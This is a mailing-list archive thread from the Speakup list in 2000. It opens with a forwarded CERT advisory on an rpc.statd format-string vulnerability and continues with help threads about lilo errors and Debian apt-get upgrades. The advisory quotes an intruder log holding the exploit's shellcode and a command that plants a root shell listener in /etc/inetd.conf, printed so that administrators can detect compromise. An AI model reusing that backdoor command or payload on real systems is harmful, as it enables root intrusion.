* CERT Advisory CA-2000-17 (fwd)
@ Joseph Norton
` Terry D. Cudney
` Upgrading in RedHat and Debian? Terry D. Cudney
0 siblings, 2 replies; 21+ messages in thread
From: Joseph Norton @ UTC (permalink / raw)
To: SPEAKUP Distribution List
Have a look at this.
---------- Forwarded message ----------
Date: Fri, 18 Aug 2000 17:56:45 -0400 (EDT)
From: CERT Advisory <cert-advisory@cert.org>
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@cert.org
Subject: CERT Advisory CA-2000-17
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CERT Advisory CA-2000-17 Input Validation Problem in rpc.statd
Original release date: August 18, 2000
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running the rpc.statd service
Overview
The CERT/CC has begun receiving reports of an input validation
vulnerability in the rpc.statd program being exploited. This program
is included, and often installed by default, in several popular Linux
distributions. Please see Appendix A of this document for specific
information regarding affected distributions.
More information about this vulnerability is available at the
following public URLs:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666
* http://www.securityfocus.com/bid/1480
I. Description
The rpc.statd program passes user-supplied data to the syslog()
function as a format string. If there is no input validation of this
string, a malicious user can inject machine code to be executed with
the privileges of the rpc.statd process, typically root.
Intruder Activity
The following is an example log message from a compromised system
illustrating the rpc.statd exploit occurring:
Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53
72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63
696e6961 2720676e 203a272f
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83> <8D>^(
<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
If you see log entries similar to those above, we suggest you examine
your system for signs of intrusion by following the steps outlined in
our Intruder Detection Checklist. If you believe your host has been
compromised, please follow our Steps for Recovering From a Root
Compromise. Please check our Current Activity page for updates
regarding intruder activity.
II. Impact
By exploiting this vulnerability, local or remote users may be able to
execute arbitrary code with the privileges of the rpc.statd process,
typically root.
III. Solution
Upgrade your version of rpc.statd
Please see Appendix A of this advisory for more information about the
availability of program updates specific to your system. If you are
running a vulnerable version of rpc.statd, the CERT/CC encourages you
to apply appropriate vendor patches. After making any updates, be sure
to restart the rpc.statd service.
Disable the rpc.statd service
If an update cannot be applied, the CERT/CC recommends disabling the
rpc.statd service. We advise proceeding with caution, however, as
disabling this process can interfere with NFS functionality.
Block unneeded ports at your firewall
As a good security practice in general, the CERT/CC recommends
blocking unneeded ports at your firewall. This option does not remedy
the vulnerability, but does prevent outside intruders from exploiting
it. In particular, block port 111 (portmapper), as well as the port on
which rpc.statd is running, which may vary.
Appendix A. Vendor Information
This section contains information provided by vendors for this
advisory. We will update this appendix as we receive more information.
If you do not see your vendor's name, the CERT/CC did not receive a
response from that vendor. Please contact your vendor directly.
Berkeley Software Design, Inc. (BSDI)
No versions of BSD/OS are vulnerable.
Caldera, Inc.
Not vulnerable: None of our products ship with rpc.statd
Compaq
At the time of writing this document, Compaq is currently
investigating the potential impact to Compaq's rpc.statd service.
Initial tests indicate it is not a potential vulnerability for Compaq
supplied software.
As further information becomes available Compaq will provide notice of
the completion/availability of any necessary patches through AES
services (DIA, DSNlink FLASH and posted to the Services WEB page) and
be available from your normal Compaq Services Support channel.
Debian
http://www.debian.org/security/2000/20000719a
FreeBSD
FreeBSD is not vulnerable to this problem.
NetBSD
NetBSD 1.4.x and NetBSD 1.5 do not appear to be affected by this
problem; all calls to syslog() within rpc.statd take a constant string
for the format argument.
OpenBSD
*Linux* systems running the rpc.statd service!
This affects noone else!
RedHat
http://www.redhat.com/support/errata/RHSA-2000-043-03.html
Silicon Graphics, Inc.
IRIX rpc.statd is not vulnerable to this security issue.
_________________________________________________________________
Authors: John Shaffer, Brian King
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-2000-17.html
______________________________________________________________________
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from
http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more
information.
Getting security information
CERT publications and other security information are available from
our web site
http://www.cert.org/
To be added to our mailing list for advisories and bulletins, send
email to cert-advisory-request@cert.org and include SUBSCRIBE
your-email-address in the subject of your message.
* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office.
______________________________________________________________________
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
_________________________________________________________________
Conditions for use, disclaimers, and sponsorship information
Copyright 2000 Carnegie Mellon University.
Revision History
August 18, 2000: Initial release
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^ permalink raw reply [flat|nested] 21+ messages in thread* Re: CERT Advisory CA-2000-17 (fwd)
CERT Advisory CA-2000-17 (fwd) Joseph Norton
@ ` Terry D. Cudney
` Thanks guys... and Segmentation fault when running Lilo? Terry D. Cudney
` Upgrading in RedHat and Debian? Terry D. Cudney
1 sibling, 1 reply; 21+ messages in thread
From: Terry D. Cudney @ UTC (permalink / raw)
To: speakup
Hi guys,
First, I want to say "Thanks" to all the helpful guys who replied to me offlist about mounting an iso CD-image file as if it were an actual cd.... Tommy, Kerry, Brian, Kirk, et al.
I've run into another problem:
I need to recompile my kernel to include the module for the loop device.... not a problem, but, when I run lilo to set it up to boot the new kernel, I get this error message:
egmentation fault (core dumped)
I can't see anything wrong with the /etc/lilo.conf file. The /sbin/lilo binary has the proper byte size, this is Redhat 6.2 on a PII 333 mhz w/ 128 MB RAM (I wondered if there might be a problem with my RAM?)
Anybody got any ideas?
--
--terry
Name: Terry D. Cudney
Phone: (905)735-6127
E-mail: terry@wasagacottage.com
WWW: www.wasagacottage.com
Postal: 18 Colbeck Drive, WELLAND, ON L3C 5B5
^ permalink raw reply [flat|nested] 21+ messages in thread* Thanks guys... and Segmentation fault when running Lilo?
` Terry D. Cudney
@ ` Terry D. Cudney
0 siblings, 0 replies; 21+ messages in thread
From: Terry D. Cudney @ UTC (permalink / raw)
To: speakup
Whoops!!!
I sent this message a moment ago by Reply:-ing to the list but forgot to chane the Subject line.
Sorry
On Wed, 23 Aug 2000, Terry D. Cudney wrote:
> Hi guys,
>
> First, I want to say "Thanks" to all the helpful guys who replied to me offlist about mounting an iso CD-image file as if it were an actual cd.... Tommy, Kerry, Brian, Kirk, et al.
>
> I've run into another problem:
> I need to recompile my kernel to include the module for the loop device.... not a problem, but, when I run lilo to set it up to boot the new kernel, I get this error message:
>
> egmentation fault (core dumped)
>
> I can't see anything wrong with the /etc/lilo.conf file. The /sbin/lilo binary has the proper byte size, this is Redhat 6.2 on a PII 333 mhz w/ 128 MB RAM (I wondered if there might be a problem with my RAM?)
>
> Anybody got any ideas?
>
>
--
--terry
Name: Terry D. Cudney
Phone: (905)735-6127
E-mail: terry@wasagacottage.com
WWW: www.wasagacottage.com
Postal: 18 Colbeck Drive, WELLAND, ON L3C 5B5
^ permalink raw reply [flat|nested] 21+ messages in thread
* Upgrading in RedHat and Debian?
CERT Advisory CA-2000-17 (fwd) Joseph Norton
` Terry D. Cudney
@ ` Terry D. Cudney
` Geoff Shang
1 sibling, 1 reply; 21+ messages in thread
From: Terry D. Cudney @ UTC (permalink / raw)
To: speakup
Hi again,
I've been using RH 6.x (up to 2 now), but have been looking at switching to Debian witht the new potato 2.2 released. Ihaven't been able to find out about Debian's facilities for upgrading to future versions.
Redhat allows to upgrade without a complete install, using the RPM package manager. Can you do this sort of thing with Debian? or must you install a new system?
Thanks again for your collective help.
--
--terry
Name: Terry D. Cudney
Phone: (905)735-6127
E-mail: terry@wasagacottage.com
WWW: www.wasagacottage.com
Postal: 18 Colbeck Drive, WELLAND, ON L3C 5B5
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Upgrading in RedHat and Debian? Terry D. Cudney
@ ` Geoff Shang
` Terry D. Cudney
0 siblings, 1 reply; 21+ messages in thread
From: Geoff Shang @ UTC (permalink / raw)
To: speakup
Hi Terry:
Debian is cooler. What you do is set up the apt package config file called
/etc/apt/sources.list so that it knows on what FTP sites the distribution
lives. This should be the closest one to you wherever possible. Then you
just do:
apt-get update
apt-get dist-upgrade
The first command updates the list of available packages and version
details, dependancies, etc. The second upgrades your distribution, either
to a more up-to-date version of your current release or to the next one,
depending on what you've put in the sources.list file. Note that this only
upgrades packages currently installed on your system.
You can also do neat things like:
apt-get install <packagename>
which will go out to the net and grab and install the requested
package. Cool or what? Of course, you can also use CD's as sources.
Geoff.
--
Geoff Shang <gshang10@scu.edu.au>
ICQ number 43634701
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Geoff Shang
@ ` Terry D. Cudney
` Kirk Reiser
` Geoff Shang
0 siblings, 2 replies; 21+ messages in thread
From: Terry D. Cudney @ UTC (permalink / raw)
To: speakup
Thanks Geoff,
This tips the scales... I'm switching to Debian!
Actually, I've already installed the base 2.2 system on a partition. I used the 'compact' install method as outlined in the installation manual, downloading diskette images of: boot.bin, root.bin and drivers-1.bin, and a base2.2 .tgz file on another partition. I can now boot this base system from the HD. BUT...
Now I need some help. the installation manuaal says to use 'DSelect', which looks to be a frontend for the 'apt-get' prog that you mentioned below..
The newarest mirror to me is:
ftp://ftp.ca.debian.org/debian/
So, I put these lines into /etc/apt/sources.list:
deb ftp://ftp.ca.debian.org/debian stable main contrib non-free
deb ftp://ftp.ca.debian.org/debian dists potato main
deb ftp://ftp.ca.debian.org/debian dists potato main binary-i386
deb http://http.us.debian.org/debian dists potato main disks-i386 current
deb http://http.us.debian.org/debian dists potato main binary-i386
Still doesn't work. It gives erros when tryig to update the packages list.
Can you tell me the syntax of the /etc/apt/sources.list file? or am I missing something else? Maybe I'd be better to do the whole installation with apt-get? how?
I have a funcional pppoe link on ADSL through eth0. Have to initialize it manually in another console before running dselect (or apt-get?). No proxy servers involved.
Will the Debian kernels (v2.1), that are on the speakup ftp site work for installing v2.2? Could I cp one for my LiteTalk into /boot, configure/run lilo and boot up talking from the HD? or just boot from a floppy made for the v2.1 install with speakup on it?
Any suggestions? Thanks again.
On Thu, 24 Aug 2000, Geoff Shang wrote:
> Hi Terry:
>
> Debian is cooler. What you do is set up the apt package config file called
> /etc/apt/sources.list so that it knows on what FTP sites the distribution
> lives. This should be the closest one to you wherever possible. Then you
> just do:
>
> apt-get update
> apt-get dist-upgrade
>
> The first command updates the list of available packages and version
> details, dependancies, etc. The second upgrades your distribution, either
> to a more up-to-date version of your current release or to the next one,
> depending on what you've put in the sources.list file. Note that this only
> upgrades packages currently installed on your system.
>
> You can also do neat things like:
>
> apt-get install <packagename>
>
> which will go out to the net and grab and install the requested
> package. Cool or what? Of course, you can also use CD's as sources.
>
> Geoff.
>
>
>
>
--
--terry
Name: Terry D. Cudney
Phone: (905)735-6127
E-mail: terry@wasagacottage.com
WWW: www.wasagacottage.com
Postal: 18 Colbeck Drive, WELLAND, ON L3C 5B5
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Terry D. Cudney
@ ` Kirk Reiser
` Terry D. Cudney
` Geoff Shang
1 sibling, 1 reply; 21+ messages in thread
From: Kirk Reiser @ UTC (permalink / raw)
To: speakup
Hi Terry: I have a mirror on bumpy which gets updated four times a
day, so whydon't you just snare the sources.list file off of speech.
Kirk
p.s. Don't bother with dselect just use apt-get. 'apt-get update',
apt-get dist-upgrade' and apt-get install package-name is about all
you need.
--
Kirk Reiser The Computer Braille Facility
e-mail: kirk@braille.uwo.ca University of Western Ontario
phone: (519) 661-3061
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Kirk Reiser
@ ` Terry D. Cudney
` Kirk Reiser
` Geoff Shang
0 siblings, 2 replies; 21+ messages in thread
From: Terry D. Cudney @ UTC (permalink / raw)
To: speakup
Hi Kirk,
> Hi Terry: I have a mirror on bumpy which gets updated four times a
> day, so whydon't you just snare the sources.list file off of speech.
Thanks! That's even better... can you give me the url? and path of the sources.list file?
OK. where do I find a man page or other docs on apt-get?
>From what I understand so far,
apt-get update', apt-get dist-upgrade' and apt-get install package-name
all need to know either the names of already-installed packages or pagkages that need to be installed, right? How doe you do a full install on a new system with only the base installed, using apt-get?
Man do I feel like a newbie!
--
--terry
Name: Terry D. Cudney
Phone: (905)735-6127
E-mail: terry@wasagacottage.com
WWW: www.wasagacottage.com
Postal: 18 Colbeck Drive, WELLAND, ON L3C 5B5
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Terry D. Cudney
@ ` Kirk Reiser
` Geoff Shang
1 sibling, 0 replies; 21+ messages in thread
From: Kirk Reiser @ UTC (permalink / raw)
To: speakup
It is in /etc/apt/sources.list on speech.braille.uwo.ca. First you
just do an apt-get update which updates the database. Then do an
apt-get dist-upgrade to upgrade your base packages to the most
current. There will be a file created in /var/lib/dpkg called
available with a list of all the packages debian knows about.
Kirk
--
Kirk Reiser The Computer Braille Facility
e-mail: kirk@braille.uwo.ca University of Western Ontario
phone: (519) 661-3061
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Terry D. Cudney
` Kirk Reiser
@ ` Geoff Shang
` Terry D. Cudney
1 sibling, 1 reply; 21+ messages in thread
From: Geoff Shang @ UTC (permalink / raw)
To: speakup
Hi:
Once you've done an apt-get update, you can use the apt-cache program to
look at available package lists. Useful commands are:
apt-cache search <expression> search for packages containing
<expression> in their descriptions. Good to pipe through more
apt-cache show <packagename> List full details for the given package
Do a man apt-cache for more info.
Geoff.
--
Geoff Shang <gshang10@scu.edu.au>
ICQ number 43634701
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Geoff Shang
@ ` Terry D. Cudney
` Geoff Shang
0 siblings, 1 reply; 21+ messages in thread
From: Terry D. Cudney @ UTC (permalink / raw)
To: speakup
Hi Geoff,
Are there any man pages for debian apps on the internet? Since I just have the base system insalled for Debian, there aren't yet any man pages. I have RedHat still available on another partition, but the Debian-spoecific man pages aren't there.
On Fri, 25 Aug 2000, Geoff Shang wrote:
> Hi:
>
> Once you've done an apt-get update, you can use the apt-cache program to
> look at available package lists. Useful commands are:
>
> apt-cache search <expression> search for packages containing
> <expression> in their descriptions. Good to pipe through more
> apt-cache show <packagename> List full details for the given package
>
> Do a man apt-cache for more info.
>
> Geoff.
>
>
>
>
--
--terry
Name: Terry D. Cudney
Phone: (905)735-6127
E-mail: terry@wasagacottage.com
WWW: www.wasagacottage.com
Postal: 18 Colbeck Drive, WELLAND, ON L3C 5B5
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Terry D. Cudney
@ ` Geoff Shang
` trouble with debian William Hubbs
` Upgrading in RedHat and Debian? Terry D. Cudney
0 siblings, 2 replies; 21+ messages in thread
From: Geoff Shang @ UTC (permalink / raw)
To: speakup
Hi:
The apt manpages should be installed, as apt should be part of the base
system. I don't know if there are any manpages for general programs, but
I'm happy to send any you want to see.
In addition to using apt-cache as I said before, you can get the files
called Packages in the various subsections of the debian release
(e.g. main, contrib, etc). This is a text file containing a list of all
the packages. Note that a good way to see if something is for Xwindows or
not is if a dependant package is xlib6g. If it is, it probably needs X so
I'd leave it alone.
Geoff.
--
Geoff Shang <gshang10@scu.edu.au>
ICQ number 43634701
^ permalink raw reply [flat|nested] 21+ messages in thread* trouble with debian
` Geoff Shang
@ ` William Hubbs
` Kerry Hoath
` Geoff Shang
` Upgrading in RedHat and Debian? Terry D. Cudney
1 sibling, 2 replies; 21+ messages in thread
From: William Hubbs @ UTC (permalink / raw)
To: speakup
Hi all,
I am attempting to install Debian from the disks at the speakup site and
having a problem.
The problem is that after I configure the keyboard, initialize and mount all
partitions and install the kernel and modules, the system still thinks I
need to install the kernel and the modules.
I am installing them from driver disks. It reads them fine and says that it
is installing them, but when the main menu comes back, the "next" indicator
shows that I need to install them again. What have I missed?
Thanks,
William
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: trouble with debian
` trouble with debian William Hubbs
@ ` Kerry Hoath
` Geoff Shang
1 sibling, 0 replies; 21+ messages in thread
From: Kerry Hoath @ UTC (permalink / raw)
To: speakup
There is currently a missmatch between the kernel on the official Debian cds
and the kernel on the speakup disks. The official kernel on the Debian cd
is 2.2.17-pre6 but the speakup one is 2.2.13 or so. This means if you intend
to install with speakup; you _must_ get your driver disks and boot disk and
root disk *from the speakup sight*.
The upshot of this is you get an older kernel but you can upgrade that later.
I should really help compile some more new Debian kernels and update the
potato images to what stable actually is.
Regards, Kerry.
On Sat, Aug 26, 2000 at 01:23:24PM -0500, William Hubbs wrote:
> Hi all,
>
> I am attempting to install Debian from the disks at the speakup site and
> having a problem.
>
> The problem is that after I configure the keyboard, initialize and mount all
> partitions and install the kernel and modules, the system still thinks I
> need to install the kernel and the modules.
>
> I am installing them from driver disks. It reads them fine and says that it
> is installing them, but when the main menu comes back, the "next" indicator
> shows that I need to install them again. What have I missed?
>
> Thanks,
>
> William
>
>
> _______________________________________________
> Speakup mailing list
> Speakup@braille.uwo.ca
> http://speech.braille.uwo.ca/mailman/listinfo/speakup
>
--
--
Kerry Hoath: kerry@gotss.eu.org
Alternates: kerry@emusys.com.au kerry@gotss.spice.net.au or khoath@lis.net.au
ICQ UIN: 8226547
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: trouble with debian
` trouble with debian William Hubbs
` Kerry Hoath
@ ` Geoff Shang
1 sibling, 0 replies; 21+ messages in thread
From: Geoff Shang @ UTC (permalink / raw)
To: speakup
Hi:
I have heard that there are times when the "next" indicator doesn't
move. Just move it on to the next item and you should be OK.
Geoff.
--
Geoff Shang <gshang10@scu.edu.au>
ICQ number 43634701
^ permalink raw reply [flat|nested] 21+ messages in thread
* Re: Upgrading in RedHat and Debian?
` Geoff Shang
` trouble with debian William Hubbs
@ ` Terry D. Cudney
1 sibling, 0 replies; 21+ messages in thread
From: Terry D. Cudney @ UTC (permalink / raw)
To: speakup
Hi guys,
This is to thank Geoff, Kirk and others who helped me with the Debian apt programs.
It turned out that my original install of the base system was not complete, thus there were no man pages for apt, et al. I reinstalled and it's all working great, except that I have no speech yet under Debian, since the rescue disks on ftp.braille.uwo.ca are for Debian 2.1 and I think Kerry said that they won't work for installing Debian 2.2. I'll be compiling the Debian kernel w/ speakup and my own configuration drivers later today.
Thanks again guys. Debian looks great. You're right Geoff, Debian's automatic update/upgrade over the net is a great step forward. .. much better than RPM's (IMHO)
--
--terry
Name: Terry D. Cudney
Phone: (905)735-6127
E-mail: terry@wasagacottage.com
WWW: www.wasagacottage.com
Postal: 18 Colbeck Drive, WELLAND, ON L3C 5B5
^ permalink raw reply [flat|nested] 21+ messages in thread
* Re: Upgrading in RedHat and Debian?
` Terry D. Cudney
` Kirk Reiser
@ ` Geoff Shang
` Brent Harding
1 sibling, 1 reply; 21+ messages in thread
From: Geoff Shang @ UTC (permalink / raw)
To: speakup
Hi:
The man pages you can look at are apt-get(8) and sources.list(5).
I don't know if there are still debian 2.2 images up on the ftp site but
surely a boot disk image from there would do the trick for you.
Geoff.
--
Geoff Shang <gshang10@scu.edu.au>
ICQ number 43634701
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Geoff Shang
@ ` Brent Harding
` Terry D. Cudney
0 siblings, 1 reply; 21+ messages in thread
From: Brent Harding @ UTC (permalink / raw)
To: speakup
What if I take a normal debian boot disk and put my speakup enabled kernel
in it? Will that do the trick?
At 10:42 PM 8/25/00 +1000, you wrote:
>Hi:
>
>The man pages you can look at are apt-get(8) and sources.list(5).
>
>I don't know if there are still debian 2.2 images up on the ftp site but
>surely a boot disk image from there would do the trick for you.
>
>Geoff.
>
>
>--
>Geoff Shang <gshang10@scu.edu.au>
>ICQ number 43634701
>
>
>_______________________________________________
>Speakup mailing list
>Speakup@braille.uwo.ca
>http://speech.braille.uwo.ca/mailman/listinfo/speakup
>
>
>
^ permalink raw reply [flat|nested] 21+ messages in thread* Re: Upgrading in RedHat and Debian?
` Brent Harding
@ ` Terry D. Cudney
` Geoff Shang
0 siblings, 1 reply; 21+ messages in thread
From: Terry D. Cudney @ UTC (permalink / raw)
To: speakup
I've done this with a RedHat boot diskette and a custom-compiled kernel w/ speakup. It worked fine.
What about taking a custome compiled, speakup-enabled kernel prepared with RedHat and putting it into a Debian boot disk?
On Fri, 25 Aug 2000, Brent Harding wrote:
> What if I take a normal debian boot disk and put my speakup enabled kernel
> in it? Will that do the trick?
> At 10:42 PM 8/25/00 +1000, you wrote:
> >Hi:
> >
> >The man pages you can look at are apt-get(8) and sources.list(5).
> >
> >I don't know if there are still debian 2.2 images up on the ftp site but
> >surely a boot disk image from there would do the trick for you.
> >
> >Geoff.
> >
> >
> >--
> >Geoff Shang <gshang10@scu.edu.au>
> >ICQ number 43634701
> >
> >
> >_______________________________________________
> >Speakup mailing list
> >Speakup@braille.uwo.ca
> >http://speech.braille.uwo.ca/mailman/listinfo/speakup
> >
> >
> >
>
>
> _______________________________________________
> Speakup mailing list
> Speakup@braille.uwo.ca
> http://speech.braille.uwo.ca/mailman/listinfo/speakup
>
--
--terry
Name: Terry D. Cudney
Phone: (905)735-6127
E-mail: terry@wasagacottage.com
WWW: www.wasagacottage.com
Postal: 18 Colbeck Drive, WELLAND, ON L3C 5B5
^ permalink raw reply [flat|nested] 21+ messages in thread
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-- links below jump to the message on this page --
CERT Advisory CA-2000-17 (fwd) Joseph Norton
` Terry D. Cudney
` Thanks guys... and Segmentation fault when running Lilo? Terry D. Cudney
` Upgrading in RedHat and Debian? Terry D. Cudney
` Geoff Shang
` Terry D. Cudney
` Kirk Reiser
` Terry D. Cudney
` Kirk Reiser
` Geoff Shang
` Terry D. Cudney
` Geoff Shang
` trouble with debian William Hubbs
` Kerry Hoath
` Geoff Shang
` Upgrading in RedHat and Debian? Terry D. Cudney
` Geoff Shang
` Brent Harding
` Terry D. Cudney
` Geoff Shang
` Brent Harding
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